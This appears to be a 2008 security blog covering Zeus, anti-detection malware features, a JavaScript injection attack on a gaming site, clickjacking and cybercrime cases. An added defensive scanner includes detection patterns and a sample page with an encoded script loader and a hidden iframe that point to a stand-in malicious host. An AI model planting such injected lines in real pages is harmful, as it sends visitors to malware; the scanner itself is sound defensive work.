Credit card fraud might have played role in financing Mumbai terror attacks, expert suggests

•December 4, 2008 • 1 Comment

Indian authorities have recovered $1,200 and several credit cards from a backpack carried by one of the terrorists who assailed ten targets in Mumbai, killing at least 172 people and injuring hundreds of others, according to press reports. The presence of the cards might signal that credit card fraud helped fund the terror attacks, Dennis Lormel, an anti-money laundering consultant who once led the Federal Bureau of Investigation’s anti-terrorist financing unit, told Complinet.

The credit cards in question reportedly were issued by Citibank, HSBC, ICICI Bank, Axis Bank, HDFC Bank and State Bank of Mauritius. “I’m interested in the potential credit card fraud as a funding source and operational support mechanism,” Lormel said. For Lormel, the possible link between credit card fraud and the Mumbai terrorist attacks is more than a fleeting interest. He has long feared that terrorists are becoming increasingly adept at generating funds through such illicit schemes; he recently wrote a white paper in which he dubbed credit card fraud a “growth industry” for terrorists. “There is no empirical statistical data establishing the nexus between credit card exploitation and terrorism, but there are ample anecdotal case studies demonstrating how extensively terrorists rely on credit card information in furtherance of their heinous activities,” Lormel wrote in his paper.

Alternative funding sources

Lormel added that a previous Complinet article examining how the Mumbai attacks might have been funded “presents interesting and viable possible funding sources.”

“It’s highly likely hawalas were used. Wealthy individual donors and charities could be funding sources, as pointed out. It will be interesting to determine if drugs and other criminal activities contributed. Likewise, the nexus between Dawood Ibrahim and the attack should be one of the highest investigative priorities,” he said.

“The attack itself will play out to be inexpensive. The overall operation will be much costlier when you factor in the training and subsistence of the attackers and their logistical support element.”

Still, Lormel conceded that it may be some time before authorities can say with any degree of certainty how the murderous rampage was funded. “It’s too early to understand the scope of the funding for the attacks,” he said.

Nobel Laureate is the father of Kevin Mitnick investigator | Zero Day | ZDNet.com

•October 17, 2008 • Leave a Comment

Crimeware get easy and progressively harder to fight

•October 17, 2008 • Leave a Comment

The Zeus Trojan kit is nothing new. It has been available on the market for around $700, and has been used in more than 150 attacks, each infecting around 4,000 computers per day, as reported by StopBadware, the online malware resource.
Some additional background:

1. The Zeus Trojan is a kit for sale: Anyone in the criminal community can purchase it for roughly $700. In the past 6 months RSA’s Anti-Fraud Command Center has detected more than 150 different uses of the Zeus kit, each one infecting on average roughly 4,000 different computers a day.

2. Resistance to detection: The kit purchased is a binary generator. Each use creates a new binary file, and these files are radically different from each other, making them notoriously difficult for anti-virus or security software to detect. To date very few variants have had effective anti-virus signatures against them, and each use of the kit usually makes existing signatures ineffective. As in most cases, this particular use of the Zeus kit did not have any anti-virus detection (with the popular engines we tested) at the time of this writing.

3. Rich feature set: the Zeus Trojan has many startling capabilities. In addition to listening in on the submission of forms in the browser, the Trojan also has advanced capabilities, for instance the ability to take screenshots of a victim’s machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs (remember when you clicked on the “Remember this password?” checkbox?)… And the features-list goes on.

In an additional twist, the Russian Business Network, which has been associated with the creation and distribution of the Zeus kit, is actively working to protect its intellectual property from security companies and their customers. RBN has threatened to sue security companies for blacklisting its products.

As this trend goes further mainstream, we are seeing the common Web 2.0 mentality, that the more people use a service the better it gets, applied to open source malware and to malware as a web service. Once the source code becomes publicly obtainable, it is not just new features and modules that get introduced; the malware also starts using the Web as a platform.

Some of the most popular open source badware code kits are successfully building communities around this open source nature, attracting criminal innovation on behalf of third-party coders.

And so we are beginning to see a demand for “quality of service”, which has led to commercial code obfuscation software such as Code Virtualizer. “Code Virtualizer will convert your original code (Intel x86 instructions) into Virtual Opcodes that will only be understood by an internal Virtual Machine. Those Virtual Opcodes and the Virtual Machine itself are unique for every protected application, avoiding a general attack over Code Virtualizer. Code Virtualizer can protect your sensitive code areas in any x32 and x64 native PE files (like executable files/EXEs, system services, DLLs, OCXs, ActiveX controls, screen savers and device drivers).

[Figure: Modified Code]
Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions. The following picture represents how a block of Intel x86 instructions is converted into different kinds of virtual opcodes, which could be emulated by different virtual machines.

When an attacker tries to decompile a block of code that was protected by Code Virtualizer, he will not find the original x86 instructions. Instead, he will find a completely new instruction set which is not recognized by him or any other special decompiler. This will force the attacker to go through the extremely hard work of identifying how each opcode is executed and how the specific virtual machine works for each protected application. Code Virtualizer totally obfuscates the execution of the virtual opcodes and the study of each unique virtual machine in order to prevent someone from studying how the virtual opcodes are executed.”

Web Based Malware Gets Smart(er) and Nasty

•October 7, 2008 • Leave a Comment

With the ongoing development of web based malware, we see an escalation of features along with the commoditization of anti-debugging features within modern malware. “Plain” simple feature sets, which in February of this year started to include what these malware creators describe as managed binary crypting and firewall bypassing verification on demand, had by August matured into an overall anti-antivirus mentality as a key differentiating factor of malware.

So what new features are they working on? Anti tracing and emulation protection, PEiD and PESniffer protection, as well as anti heuristic scanning.

Here’s a translated description (courtesy of the fine minds at Kaspersky):

“– The binary works under admin and under normal user
– The binary is always run as the “current user”
– An unlimited number of bots can be loaded and integrated within the command and control, and with the geolocation feature, filters can be applied for a particular country
– After successful infection, the binary, which is tested against popular firewall and proactive protection security, ensures that the actions it takes and their order do not trigger proactive protection mechanisms in place
– Binary file size is 25k; the size can be reduced once it’s crypted
– Doesn’t take advantage of BITS protocol
– Doesn’t allow an infected host to be infected twice
– Bypassing NAT and supporting “always-on” connections
– A simple, easy to configure web based admin panel”

JavaScript Injection Attack

•September 30, 2008 • Leave a Comment

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply “steal” a website’s visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide.

[Screenshot: JS Injection]

We’ve seen numerous high traffic, legitimate websites attacked using this technique. One recent example is MegaGames, a very popular U.S. gaming portal ranked 3172 on Alexa. The JavaScript injection attack successfully exploited one of MegaGames’ servers to insert a couple of extra lines of code. This addition redirects unsuspecting website visitors to a malicious European site where the main infection attempts are carried out.

The malicious site attempts two different methods to attack its visitors. The first is an attempt to exploit a Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (MS06-014).

[Screenshot: JS Attack]

This attack would only affect website visitors using versions of Microsoft’s Internet Explorer (IE) browser, as the website basically requires visitors to use an ActiveX Control, then uses a loophole in the way the ActiveX Control interacts with the IE browser to provide remote attackers complete control over a victim’s system.

The second attack attempted is a drive-by download, which affects not only the IE browsers, but also Firefox 1.0 & 2.0 browsers. This attack uses JavaScript to detect the browser’s type, then uses Adobe Flash exploits to download and execute a malicious binary file onto the system.

[Screenshot: Flash Exploits]

The MegaGames website is currently still compromised and its misfortune illustrates a good point. Many Internet users are under the impression that they can only get infected with malware if they visit “obviously risky” (dodgy) websites, such as “pr0n” or “warez” sites. Unfortunately, that’s not true. Malware writers have been getting more sophisticated and today, even legitimate news or business sites can get surreptitiously compromised.

Another good example that no site is safe — BusinessWeek.com — a very legitimate and high traffic site. It has fallen victim to an SQL Injection attack, and such attacks inject JavaScript…
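The MegaGames case above comes down to a few foreign lines inserted into an otherwise legitimate page. A site operator can catch that by diffing served pages against an allowlist of script origins and a few loader patterns. The following scanner is an added example, not code from the original post; the host names, the allowlist and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (constructed for the example).
ALLOWED_HOSTS = {"www.portal.example", "cdn.portal.example"}

# Inline-script patterns typical of injected loaders: an encoded document.write,
# a long percent-encoded blob, or eval() where the site never uses it.
SUSPICIOUS = [
    (re.compile(r"document\.write\s*\(\s*unescape", re.I), "document.write(unescape(...)) loader"),
    (re.compile(r"(?:%[0-9a-f]{2}){12,}", re.I), "long percent-encoded blob"),
    (re.compile(r"\beval\s*\(", re.I), "eval() in inline script"),
]


class ScriptCollector(HTMLParser):
    """Collects external script/iframe sources, zero-size iframes and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # (tag, src) pairs
        self.hidden_iframes = 0
        self.inline = []        # bodies of <script> without src
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            if a.get("src"):
                self.external.append((tag, a["src"]))
            else:
                self._in_script = True
        elif tag == "iframe":
            if a.get("src"):
                self.external.append((tag, a["src"]))
            if a.get("width", "").strip() == "0" or a.get("height", "").strip() == "0":
                self.hidden_iframes += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands <script> content through as raw text, so it lands here.
        if self._in_script and data.strip():
            self.inline.append(data)


def scan_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of findings for script/iframe content the site did not author."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for tag, src in p.external:
        host = urlparse(src).hostname      # None for same-origin relative paths
        if host and host not in allowed_hosts:
            findings.append(f"<{tag}> loads from untrusted host {host}")
    if p.hidden_iframes:
        findings.append(f"{p.hidden_iframes} zero-size iframe(s)")
    for body in p.inline:
        for pat, label in SUSPICIOUS:
            if pat.search(body):
                findings.append(label)
    return findings


# Constructed sample: a legitimate page with two injected lines appended to the body.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.portal.example/site.js"></script>
<script src="/js/menu.js"></script>
</head><body><h1>Game news</h1>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fevil-redirect.invalid%2Fx.js%22%3E%3C%2Fscript%3E'))</script>
<iframe src="http://evil-redirect.invalid/in.html" width="0" height="0"></iframe>
</body></html>"""
```

Run `scan_html(SAMPLE_PAGE)` to list the injected iframe, its zero-size attributes and the encoded loader, while the two legitimate script tags pass silently.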

UAE gets new special anti-cybercrime body

•September 30, 2008 • Leave a Comment

Note: I will be visiting Dubai to follow up on a number of cybercrime activities.

Cybersecurity in the United Arab Emirates has just got tighter following the announcement of the creation of the UAE Computer Emergency Response Team. The UAE’s Telecom Regulatory Authority has tasked this new group, which will start operations this year, with fighting cybercrime in the country.

The official unveiling of aeCERT has been made at the inaugural Deep Knowledge Security Conference, attended by regional and international cybersecurity experts. Mohammed Nasser Al Ghanim, director of the UAE’s Telecom Regulatory Authority, spoke of the need to create such a unit given the growing problems surrounding cybercrime in the region. “This year, the UAE counteracted many attacks, mainly website defacement, phishing attacks and many others. These attacks caused immense damage to the businesses,” said Al Ghanim.

A quick start to operations has been promised, as aeCERT should come online by the end of 2007. “The team will begin operation by the fourth quarter of this year. It will be comprehensive and help prevent much Internet crime,” said Fatma Bazarghan, who will head the new hi-tech unit. The UAE lately has been the focus of attention regarding cybercrime in the Gulf, as a large cyberfraud gang offering bogus services from the Dubai International Finance Centre was dismantled. Even more recently the authorities thwarted a hacking attempt on the Dubai eGovernment computer network, and the UAE is a regional leader in terms of sheer numbers of cyberattacks. However, much has also been done to safeguard online safety in the country with the adoption of strict anti-cybercrime laws in 2006. The establishment of the new crime-fighting group is another step in the right direction for the UAE.

New Clickjacking affects all browsers

•September 27, 2008 • 3 Comments

Jeremiah Grossman and Robert “Rsnake” Hansen initially planned to reveal details on a new browser-agnostic clickjacking exploit at the Open Web Application Security Project (OWASP) in New York City this week, but voluntarily pulled the presentation after discovering that the 0-day flaw affected an Adobe product. The term “clickjacking” refers to a process by which a user is forced to click on a link without his or her knowledge—the link itself may be nearly invisible or visible for only a fraction of a second.

Clickjacking isn’t a new attack vector, but according to Grossman and Hansen, it’s one that is “severely underappreciated and largely undefended.” What makes the attack noteworthy, in this case, is that it appears to be completely browser-agnostic, and affects both Firefox 2 and 3, all versions of IE (including 8), and presumably all versions of Opera, Konqueror, Safari, and whatever other extremely marginalized and/or FailCat type of browser one might use to surf the web. The only browsers currently immune to whatever it is the two men discovered are text-based products, such as Lynx.

In this case, “whatever it is,” actually is the only appropriate label for this new attack method; Grossman and Hansen have released virtually no information on how one would actually exploit the vulnerability. Grossman and his teammate appear to have held off publishing after Adobe requested they do so, rather than as a favor to the browser market. In his blog, Grossman writes: “At the time, we believed our discoveries were more in line with generic Web browsers behavior, not traditional “exploits,” and that guarding against clickjacking was largely the browser vendors’ responsibility.”

Grossman and Hansen have, however, released a bit of information on what won’t protect a user from the exploit. Turning JavaScript off is apparently useless; the attack doesn’t use it. Instead, it takes advantage of what the two call a “fundamental flaw” inherent to all modern browsers, and an issue that cannot be fixed with a quick patch. Using a frame buster script will protect a person from assaults that utilize cross-domain scripting, but will not prevent the attack from operating normally if it’s on a page the user is visiting.

As exploits go, this particular one seems a tempest in a teapot. The vulnerability in question may affect all web browsers, but the total dearth of publicly available data means anyone wanting to utilize it has their work cut out for them. Grossman states that this particular attack is capable of some “pretty spooky,” things, but that’s all the detail we get. I’m not a fan of security through obscurity, but that’s not what anyone is advocating—Adobe has acknowledged the problem, and the dev teams on both Firefox and IE are undoubtedly aware of the flaw’s existence. Hopefully they also received a bit more information than the public did.

250k of Harvested Hotmail Emails Go For?

•September 26, 2008 • Leave a Comment

$50 in this particular case. Keep in mind, however, that the email harvester is anything but ethical, and this very same database will be sold and re-sold more times than the original buyer would like to know about. Moreover, what someone is offering for sale may in fact already be available as a value-added addition to a managed spamming service.

With metrics and quality assurance applied in a growing number of spam and phishing campaigns, filling in the niche of email harvesting by distinguishing between different types of obfuscated emails by releasing an easily embeddable module, was an anticipated move. What’s to come? Spam and malware campaigns across social networks “as usual” will propagate faster thanks to the ongoing harvesting of usernames within social networks, that would later on get imported in Web 2.0 “marketing” tools targeting the high-trafficked sites and automatically spamming them.

From a spammer’s perspective, geolocating these 250k emails could increase their selling price, since the buyers would be able to launch localized attacks with messages in the native languages of the recipients. Is the demand for quality email databases fueling the development of this market segment, or are the spammers serving themselves and cashing in by reselling what they’ve already abused a long time ago? That seems to be the case, since there’s no way a buyer could verify the freshness of the harvested email database and whether or not it has already been abused.

For the time being, we’ve got several developed and many other developing market segments within spamming and phishing, as different markets with different players. On one hand are the legitimate-looking spamming providers offering “direct marketing services”, working with lone spammers who find a reliable business partner in the spamming vendor, whose customers drive both sides’ business models. On the other hand, you’ve got the spammers excelling in outsourcing the automatic account registration process, coming up with ways to build a spamming infrastructure, already available as a module to integrate in managed spamming services, using legitimate services as the provider of the infrastructure.

Although the arms race seems to be going on at several different fronts, spammers vs. the industry and spammers vs. spammers fighting for market share, the entire underground ecosystem is clearly allocating a lot of resources to research and development in order to ensure that they are always a step ahead of the industry.

Second TJX Case Defendant Pleads Guilty

•September 26, 2008 • Leave a Comment

A second defendant in the so-called TJX Breach case—which also had at least seven other major retail chains as fellow victims—pleaded guilty Monday (Sept. 22), this time to charges of conspiracy, unauthorized access to computer systems, access device fraud and identity theft.

The accused, Christopher Scott, a 25-year-old Miami resident, pleaded guilty after prosecutors said they could prove that he was paid $400,000 for assisting a retail wardriving scheme. Scott’s plea follows the Sept. 11 guilty plea of fellow Miami resident Damon Patrick Toey.